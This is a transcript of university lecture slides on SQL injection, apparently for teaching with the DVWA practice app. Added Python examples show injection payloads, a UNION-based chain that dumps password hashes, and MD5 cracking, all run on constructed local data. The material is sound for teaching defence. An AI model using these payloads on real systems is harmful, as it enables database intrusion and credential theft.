SQL Injection at Hashemite University
Transcript of SQL Injection at Hashemite University
[Slide 1]
The Hashemite University, Prince Al-Hussein Bin Abdullah II Faculty for Information Technology
SQL Injection, with Yusuf Ali
Network Security, by Dr. Ashraf Aljammal
[Slide 2]
What will we learn?
1) What is SQL injection?
2) How to attack using SQL injection?
3) What is the DVWA project?
4) How to use DVWA to develop our skills?
[Slide 3]
SQL Injection
[Slide 4]
How to hack a website using SQL injection?
[Slide 5]
The vulnerability is executing user input without checking it. An input such as a username or password may itself contain a SQL statement, which the server then executes against its database on the attacker's behalf.
1) Normal password: karcobia
$sql = "select * from users where pass=$password;"
2) Attacker's password: abc or 1=1
$sql = "select * from users where pass=abc or 1=1;"
Because 1=1 is always true, the WHERE clause matches every row, so the query returns every user instead of only the one whose password was entered.
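The following is an added example, not code from the slides: the slide's vulnerable login query and its hardened form, written in Python with an in-memory SQLite database standing in for DVWA's PHP/MySQL stack. The users table and its passwords are constructed for the example. The slide leaves $password unquoted; a real login form places the value inside quotes, so the payload here first closes that quote (x' or '1'='1) instead of using the slide's abc or 1=1. The parameterised version sends the value separately from the statement text, so the same payload is compared literally against the pass column and matches nothing.

```python
import sqlite3

# Constructed sample data standing in for the slide's "users" table
# (names and passwords are made up for this example).
SAMPLE_USERS = [
    ("alice", "karcobia"),
    ("bob", "hunter2"),
    ("admin", "s3cr3t!"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, password: str) -> list:
    """The slide's pattern: the submitted password is pasted into the SQL text.

    With the value inside quotes, an attacker closes the quote and appends
    an always-true condition; the WHERE clause then matches every row.
    """
    sql = f"select * from users where pass='{password}'"
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, password: str) -> list:
    """Hardened form: a parameterised query.

    The driver transmits the value separately from the statement, so the
    payload is treated as data and can never change the query's logic.
    """
    sql = "select * from users where pass=?"
    return conn.execute(sql, (password,)).fetchall()


def demo() -> dict:
    """Run the normal login and the attack against both query styles."""
    conn = make_db()
    payload = "x' or '1'='1"
    return {
        "normal_login": login_vulnerable(conn, "karcobia"),
        "attack_on_vulnerable": login_vulnerable(conn, payload),
        "attack_on_safe": login_safe(conn, payload),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Against the vulnerable function the payload returns all three rows, which is exactly the "all users and passwords" result shown on the next slide; against the parameterised function it returns an empty list.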
[Slide 6]
As we can see, we got all the users and passwords in the database!
[Slide 7]
The attacker can execute any SQL statement, as if with admin privileges! In practice the injected statement runs with whatever privileges the web application's own database account has, which is frequently far more than the application needs.
Result
[Slide 8]
DVWA project: http://www.dvwa.co.uk/
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing servers and web applications, and to be used to teach students ethical hacking and pentesting.
See more at: http://www.hackw0rm.net/2013/02/how-to-create-penentration-lab-in.html
[Slide 9]
Let's try it!
[Slide 10]
SQL Injection: gather information about the database
1) Version of the database
2) Database user
3) Database name
4) Tables listed in information_schema
5) Information from the mysql tables (for example mysql.user)
6) Users and passwords
7) Crack the password hashes (hashes cannot be decrypted, but unsalted MD5 hashes can be looked up in large precomputed databases)
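The following is an added example, not code from the slides or from DVWA, that walks the enumeration steps above end to end. It uses Python with an in-memory SQLite database standing in for DVWA's MySQL; the vulnerable lookup function is a hypothetical page modelled on DVWA's low-security SQLi form, which places an id parameter inside quotes in a two-column SELECT, and the users table, password hashes and wordlist are all constructed here. SQLite has no user() or database() function and no mysql schema, so steps 2, 3 and 5 appear only as comments giving the MySQL expressions; steps 1, 4, 6 and 7 are executed. The attack technique is UNION-based injection: close the quote, append a SELECT with the same number of columns, and comment out the rest of the original query.

```python
import hashlib
import sqlite3

# Constructed data modelled on DVWA's "users" table (assumption: a column
# named "password" holding unsalted MD5 hashes). Values are made up here.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", hashlib.md5(b"password").hexdigest()),
    (2, "Gordon", "Brown", "gordonb", hashlib.md5(b"abc123").hexdigest()),
    (3, "Pablo", "Picasso", "pablo", hashlib.md5(b"charley").hexdigest()),
]

# Constructed stand-in for the huge online MD5 lookup databases.
WORDLIST = ["123456", "password", "abc123", "qwerty", "letmein"]


def make_db() -> sqlite3.Connection:
    """Create the in-memory database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_user(conn: sqlite3.Connection, user_id: str) -> list:
    """Hypothetical injectable page, modelled on DVWA's low-security SQLi form:
    the id parameter is concatenated straight into a two-column query."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def inject(conn: sqlite3.Connection, union_select: str) -> list:
    """Attacker helper: close the quote, UNION a two-column SELECT of our own,
    and comment out the trailing quote with '-- '. The leading 'x' makes the
    original row match nothing, so only injected rows come back."""
    payload = f"x' UNION SELECT {union_select} -- "
    return lookup_user(conn, payload)


def db_version(conn: sqlite3.Connection) -> str:
    """Step 1: database version.
    MySQL: @@version or version(); SQLite: sqlite_version().
    Steps 2 and 3 on MySQL would use user() and database() the same way."""
    return inject(conn, "sqlite_version(), NULL")[0][0]


def list_tables(conn: sqlite3.Connection) -> list:
    """Step 4: enumerate tables.
    MySQL: SELECT table_name, table_schema FROM information_schema.tables
    (and information_schema.columns for column names).
    SQLite keeps its catalogue in sqlite_master instead.
    Step 5 on MySQL would read user, password from mysql.user."""
    rows = inject(conn, "name, sql FROM sqlite_master WHERE type = 'table'")
    return [name for name, _ in rows]


def dump_credentials(conn: sqlite3.Connection) -> dict:
    """Step 6: pull user names and password hashes from the table found in step 4."""
    rows = inject(conn, "user, password FROM users")
    return {user: pw_hash for user, pw_hash in rows}


def crack_md5(hashes: dict, wordlist: list) -> dict:
    """Step 7: MD5 is not reversed; each candidate word is hashed and the digest
    looked up, which is what the online MD5 databases do at huge scale.
    Hashes whose plaintext is not in the wordlist stay uncracked."""
    table = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}


def run_attack(conn: sqlite3.Connection) -> dict:
    """Chain the executed steps and return everything recovered."""
    creds = dump_credentials(conn)
    return {
        "version": db_version(conn),
        "tables": list_tables(conn),
        "hashes": creds,
        "cracked": crack_md5(creds, WORDLIST),
    }


if __name__ == "__main__":
    for key, value in run_attack(make_db()).items():
        print(f"{key}: {value}")
```

The admin and gordonb hashes are found in the wordlist, while pablo's hash (of a word the constructed list does not contain) stays uncracked, which is the situation the next slide's question is about: a hash survives lookup attacks only if its plaintext is absent from the attacker's precomputed tables.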
[Slide 11]
How can you ensure that your password hash is not in one of the huge MD5 lookup databases?
[Slide 12]
What did we learn?
1) What is SQL injection?
2) How to attack using SQL injection?
3) What is the DVWA project?
4) How to use DVWA to develop your skills?
[Slide 13]
[Slide 14]
Thank you for your time and attention!
Contact info:
Email: [email protected]
Twitter: @YusufAmroJunior GIS Web and Mobile Application Developer
JoGulf Spatial Data Systems